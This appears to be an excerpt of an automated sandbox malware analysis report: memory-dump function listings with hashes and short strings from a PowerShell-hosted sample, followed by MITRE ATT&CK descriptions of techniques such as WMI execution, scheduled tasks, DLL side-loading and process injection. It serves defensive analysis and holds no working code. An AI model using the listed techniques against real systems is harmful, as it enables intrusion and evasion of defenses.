Instruction Fuzzy Hash: 78D13776A543118BC724CF28CC913ABB7E2EFD5310F088A2DE8D58B394EB789945C785

Function 0041AD81 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

CM, xrefs: 0041AF47
x3,-, xrefs: 0041AE6E

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: CM$x3,-
API String ID: 0-963954796
Opcode ID: 4de653d71386804ff8eefce6173c6268b1ee3d72daab71427b5753f354fada18
Instruction ID: 60a2503823a4bd7a06fd63a5a117870e708642e8d87b92e168cd7b561aa8ac81
Opcode Fuzzy Hash: 4de653d71386804ff8eefce6173c6268b1ee3d72daab71427b5753f354fada18
Instruction Fuzzy Hash: E8917EB4911B009FC7249F29C992657BFF0FF0A310B448A5EE4D68BB95D334E41ACB96

Function 0041D172 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

_8Y, xrefs: 0041D208
[U, xrefs: 0041D210

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 2de7e5a8a420d7dd93a59f68573543f01e92f0f538d171cd9344b6dd381d8216
Instruction ID: dbbf278c2bacecff999c145e9aaa370764f689556e24d9aac89d4aa807a88380
Opcode Fuzzy Hash: 2de7e5a8a420d7dd93a59f68573543f01e92f0f538d171cd9344b6dd381d8216
Instruction Fuzzy Hash: 7B6121B4A4C3608BD700DF24D8526ABB7F1EF92304F18896DE8C49B391E739D946C75A

Function 0041D189 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

_8Y, xrefs: 0041D208
[U, xrefs: 0041D210

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: ca1f04ffdd9432a76503c3722e4270e3a79fa3bc8024ed315014797cf7c4e397
Instruction ID: 745f7f357dcc798e0013ac37dd40356403c72cfde69a1ac2245775e34d3d9e00
Opcode Fuzzy Hash: ca1f04ffdd9432a76503c3722e4270e3a79fa3bc8024ed315014797cf7c4e397
Instruction Fuzzy Hash: 1F5122B4A4C3208BD700DF24D8526ABB7F1EF92304F18896DE8949B391E739D946C75A

Function 004290B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

dV3T, xrefs: 004290DA
5B3@, xrefs: 004290C2

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: 5B3@$dV3T
API String ID: 0-261990991
Opcode ID: 9672135063d689be0f5c0da4d90228940091206f365f4ce267bd247f00f7031f
Instruction ID: b29054f4564d7df0cb3ea9a5e2943f07c54ff90192ee1d7b0b27b06a36dd0a19
Opcode Fuzzy Hash: 9672135063d689be0f5c0da4d90228940091206f365f4ce267bd247f00f7031f
Instruction Fuzzy Hash: 9931CDB16083948FD3108F6A988075FFBF6BBD6704F149A2CE5D59B295C7B4C502CB0A

Function 00414A50 Relevance: 2.4, Strings: 1, Instructions: 1153COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00415160

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: e35037375cacc29c2700c5964f5e77410c8e76d8431f921fadb8dc7791ffeb2a
Instruction ID: ac143a8930134034007b8af92fea92a390f1b734c9e387aabf5c60ab9bf73dd2
Opcode Fuzzy Hash: e35037375cacc29c2700c5964f5e77410c8e76d8431f921fadb8dc7791ffeb2a
Instruction Fuzzy Hash: DA626679A08300DFD7149F24E8527BBB3A1FBD6315F04483DE88157391E779A946CB8A

Function 004266C0 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

:, xrefs: 004267D6

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-3726092367
Opcode ID: aa0792222c5b9684ba4fd6850a9b803e48086273b0a51499fd990f25d9074ad7
Instruction ID: 7df7a0f5e433484fd3e1450489786986de220561401b8d80e1db3af9318195ab
Opcode Fuzzy Hash: aa0792222c5b9684ba4fd6850a9b803e48086273b0a51499fd990f25d9074ad7
Instruction Fuzzy Hash: B2F16AB16083518FD7149F24985122BBBE1EFCA314F09897EF4D59B382D738D805CB96

Function 0043B813 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

,1, xrefs: 0043B9E3

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: ,1
API String ID: 0-24929940
Opcode ID: 6d98587f8939d2c012a2ba08d197a3741554830b5bb66b06610b840544a59760
Instruction ID: 70cabcac6185b1f3bcd3dd34b1d372158257d7fa3f1c7033ed7c5e511fe8c256
Opcode Fuzzy Hash: 6d98587f8939d2c012a2ba08d197a3741554830b5bb66b06610b840544a59760
Instruction Fuzzy Hash: 2D517A75610A118BCB1CCF39DC6163EBBE2FB5A304318597DC452DB362EB389812CB58

Function 0043E8D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

@, xrefs: 0043E9AB

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f632a22a1e48b0de2b4717cc6f6b78ca9cb0167c083d7e6f6a4ec36ca7e7f6ab
Instruction ID: b2ec713f50e1ec4eaefd64698c8318637090bd4f0642cad91035488fd90acfa6
Opcode Fuzzy Hash: f632a22a1e48b0de2b4717cc6f6b78ca9cb0167c083d7e6f6a4ec36ca7e7f6ab
Instruction Fuzzy Hash: F74120B1A053008BD7188F15CC51B7BBBA2FFC9318F08991CE5855B3A1E779A900CB86

Function 0043DAA0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 0043DAF0

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: c7a3a9d6f5937d9205306e379e1e2512675795707a895483ba62705f79feabf5
Instruction ID: a23abe0358fa0849b5f663c248be2e251b5f046dfc51c7ea43b64499bc67c0e0
Opcode Fuzzy Hash: c7a3a9d6f5937d9205306e379e1e2512675795707a895483ba62705f79feabf5
Instruction Fuzzy Hash: FF21DDB15083049FD310DF18E88066BF7F6FBCA328F15992DE58983250D335A918CB96

Function 00428290 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

$, xrefs: 00428360

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 7e9eeca076646084577e87f5d9acb102ddda44551bdeeca6dda54682bffb2a07
Instruction ID: 7a068acf58ebef1d210fa69d69541f2c5c9bc79e2dec821b2b4ff52ea8107aaa
Opcode Fuzzy Hash: 7e9eeca076646084577e87f5d9acb102ddda44551bdeeca6dda54682bffb2a07
Instruction Fuzzy Hash: 762136367593605BE314CF659C81B5FB7B2DBC1700F0AC42DA4D99B2C6C9B8D80A8756

Function 0043BC14 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 0043BC25, 0043BC55, 0043BC71

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 6d2294f8cacab3f0f970d0ee1678d9506feb83dbf5f0a7d4737b5ff95201ad51
Instruction ID: 7f4b09913f0c4abacf42e2bbe7559fe01a60ae4286a92feb91b620ed9f74a0dd
Opcode Fuzzy Hash: 6d2294f8cacab3f0f970d0ee1678d9506feb83dbf5f0a7d4737b5ff95201ad51
Instruction Fuzzy Hash: B3F04F24A149544FEBE18F78985A3BF6BE0E717214F202DB8C64EE32E1DD2888814B0C

Function 0043D140 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3fcc00706a376c52207e30c628e70039b49eec27027567f79dcaef42f4181ae
Instruction ID: 09edd9b6824f7118e743e247c6caaa2d8346ae838c78279bd6518b238456887a
Opcode Fuzzy Hash: a3fcc00706a376c52207e30c628e70039b49eec27027567f79dcaef42f4181ae
Instruction Fuzzy Hash: 7322F135A18211CFC718CF28E89066AB3E2FF8E314F1A85BDD88987361D7359C56CB85

Function 00407440 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction ID: c6e7e0eecc3ae9082c8c74c14a25bc73344ef5ca37a1c3531291a6eafb6908a2
Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction Fuzzy Hash: 8722A431A0C7158BD7249F18D8406ABB3E1AFD4319F29893ED986A7381D738B855CB47

Function 00437790 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdebdcdb8a684b89f5ec6416a8cfa540fc9014513f940399d9389759583fd22c
Instruction ID: 1fa58a256ad726d162af61c6a4ba65c3f65b1c06421518291ba0ea82c3a5a395
Opcode Fuzzy Hash: bdebdcdb8a684b89f5ec6416a8cfa540fc9014513f940399d9389759583fd22c
Instruction Fuzzy Hash: 7AE167B26083148BD324DF24C89166BB7A2FBC9318F19A92EE8C597345D739EC06C785

Function 0043DBB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43917dd25d679a2360db25fe33f05fca1e10fe5717d787509b50d3060ef91739
Instruction ID: 0bb5358823ca19faea0024899962b23b6631256abee3cb20e7358cbf689dc8d4
Opcode Fuzzy Hash: 43917dd25d679a2360db25fe33f05fca1e10fe5717d787509b50d3060ef91739
Instruction Fuzzy Hash: 6B817736E046149BC724AF28D88167BB7A3EFD8710F19D12DE8C98B354EB34AD11C789

Function 0041D560 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e873b81ed12660d16a09e44f5a944882d5d5f9f7288e937d30a2de1e2c07ff79
Instruction ID: 494c3fb6f51e268f5f46a3a7be25e565d0a98f12c166373c7ff79cb36cd48b0c
Opcode Fuzzy Hash: e873b81ed12660d16a09e44f5a944882d5d5f9f7288e937d30a2de1e2c07ff79
Instruction Fuzzy Hash: 3C915BB2E042615FC7158E28C85139F7BE2AB95324F19863EE8B9973C1D7389C4697C1

Function 0040EDB4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5188a9d796099f86fec12aa63e79c477e9d1383c8034bb461d2f8a32d88d778f
Instruction ID: 66de83c2fec742c95e5d55e29497453cf8568ef0a966fd47b4dc6357c3e645e9
Opcode Fuzzy Hash: 5188a9d796099f86fec12aa63e79c477e9d1383c8034bb461d2f8a32d88d778f
Instruction Fuzzy Hash: FE5115756082818FD324CB29D8807BFB7E2BBD9354F24CD3ED48667395DB754842878A

Function 0042B078 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923bd237ac351128d861a68e4943622d5ee83bbf93f029a73746bdd7f0dd0e9a
Instruction ID: dbb3674a2e8f73245087c39d645aa7023acca4e3e9b0c8888b481629fceeec0d
Opcode Fuzzy Hash: 923bd237ac351128d861a68e4943622d5ee83bbf93f029a73746bdd7f0dd0e9a
Instruction Fuzzy Hash: F94118A460C3E19BE7358F29A8B07B77BD0EF63344F28486DE4DA47342D6784505C796

Function 00437D00 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b258c85d7a5d5e09e9a4407aabdd523d535645714c34ec41219cf0f412fbf1a
Instruction ID: ed0009d1c30cc1f0f657e26407b4ff95fe3cd7fc6b5840a17695d88b0d6138d2
Opcode Fuzzy Hash: 8b258c85d7a5d5e09e9a4407aabdd523d535645714c34ec41219cf0f412fbf1a
Instruction Fuzzy Hash: CC4129F6A083145BE720AE15DC82B7BB7A5EF89708F14182DF4C593241E779ED04879A

Function 0043F040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8d12496346604b961767bddfa285f006b9495ce7ac756b21f3429745baad4f59
Instruction ID: d7b0e377107363a4bde1ea531ab8f4f052a45cc3a3bc63747b85af0ac1831aeb
Opcode Fuzzy Hash: 8d12496346604b961767bddfa285f006b9495ce7ac756b21f3429745baad4f59
Instruction Fuzzy Hash: 6F412475B05304EFE7148A19DDC0B3BB3A6EB8D718F24953DE0C5972A1CA78BC15C689

Function 0043B46A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 308b0e695bef76961bc0ed1455965661c2b88a6a61b052c21be965f0ad2b0062
Instruction ID: 72068da91cc225693571a2d0bee7c3217557958dc373b5a5a21772a4d51bfb07
Opcode Fuzzy Hash: 308b0e695bef76961bc0ed1455965661c2b88a6a61b052c21be965f0ad2b0062
Instruction Fuzzy Hash: D74136B5E106029BCB08CF39EC611BDBBA2FB95300F18823DD402E7355EB38A555CB89

Function 00416D52 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acfc468b7e43bb10b7ff0d0152cbb3a7f5b98f9e373c09cf49a125895592c8d8
Instruction ID: 973eee2791ebfe2c201db5a32ccb4339f29592fdc2cee3d22bab1a54a7c8b2b4
Opcode Fuzzy Hash: acfc468b7e43bb10b7ff0d0152cbb3a7f5b98f9e373c09cf49a125895592c8d8
Instruction Fuzzy Hash: EF11DAB570C2018BD328CF25D8411677792FBDA359F2A857DC4C693311E638C896CB4E

Function 0043BCDB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22c82c6afaff4323aeddcf8a0b323081299386c62de936f749b2d5089645518
Instruction ID: 44b108f5c51c809564f144fab21c768bc7a1147cc1edb25e7a74140109bb06bc
Opcode Fuzzy Hash: c22c82c6afaff4323aeddcf8a0b323081299386c62de936f749b2d5089645518
Instruction Fuzzy Hash: 7C110676E146118BCB18CF69CC523BAB7B2EB99200F19D155C955A7348D73CA813CBD8

Function 00428640 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e06c00256e479c0b581d86fe3d944c75944de29cb1233b7d147efa5f1af7330d
Instruction ID: f61ec92dad2fd4602637d309349e992f4572622f6c6272088c11177126769445
Opcode Fuzzy Hash: e06c00256e479c0b581d86fe3d944c75944de29cb1233b7d147efa5f1af7330d
Instruction Fuzzy Hash: 3D018039A0A6209BC7188F10E45153FF7B1EB9A714F55986DD58263252CB7CEC068B8A

Function 00429DA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction ID: 98c5902008ec262a901b4120b44f5f9056f1ed7b7d2b9e352d563ad5ba31e3e8
Opcode Fuzzy Hash: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction Fuzzy Hash: 4901B5F1B0031157DB20DE11E4C072BB2A86F95708F88003ED80857382EF79FC14D299

Function 004146C0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: bb4e2a52db73081763e4cc20a31c5bd5ee5cd117bafd3b88ef307c5ea5bcf149
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: DE01F27BA013028B8324CE9CC0D0AABB3B0FFD6794B2A445ED5805B3B0C7359C558224

Function 004210F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f605033f8a75f5b441b18b6f9fe9693a2b1c21f2820c23dcb107478b9488255e
Instruction ID: 4fdb3731ec9b1575b7a6813feb3d46eefc33fa445370c85974d5c3868d714a98
Opcode Fuzzy Hash: f605033f8a75f5b441b18b6f9fe9693a2b1c21f2820c23dcb107478b9488255e
Instruction Fuzzy Hash: 3FB092A9C0A81186D8112B113D035AAB0284E13218F082036E80632247BE2AF21A509F

Function 004234B7 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00423606

Strings

uw, xrefs: 00423503
H:B, xrefs: 0042349C, 004234B1
xs, xrefs: 004234FC
pz, xrefs: 0042376E, 004234A8
pz, xrefs: 004236BA

Memory Dump Source

Source File: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.4456127853.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: DrivesLogical
String ID: H:B$pz$pz$uw$xs
API String ID: 999431828-1762182995
Opcode ID: ffd0a98ec40f3e7c8e4b77ea1664b5a147b98ae172b7dd95e73b24025a02c0b6
Instruction ID: a8d23ff692b1174eb06db715e9a28044fd6105134fdaffa46370887a1062778d
Opcode Fuzzy Hash: ffd0a98ec40f3e7c8e4b77ea1664b5a147b98ae172b7dd95e73b24025a02c0b6
Instruction Fuzzy Hash: 718104B9E01216CFDB14CF64E8916AABB70FF1A304B4991A8D445AF322D738D981CFC5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

